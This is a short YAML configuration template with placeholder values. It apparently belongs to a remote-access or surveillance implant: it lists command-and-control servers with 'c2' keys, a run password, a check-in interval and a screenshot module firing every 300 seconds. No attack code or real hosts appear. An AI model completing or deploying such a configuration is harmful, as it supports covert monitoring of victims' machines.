installation:
  runPassword: 'some password'
  dbPath: 'db path'
communication:
  interval: 'in seconds'
  servers:
    - address: 'address'
      key: 'c2 password'
    - address: 'another address'
      key: 'another c2 key'
apps:
  screenshot:
    interval: 300
  securityGuard:
    isSafe: true
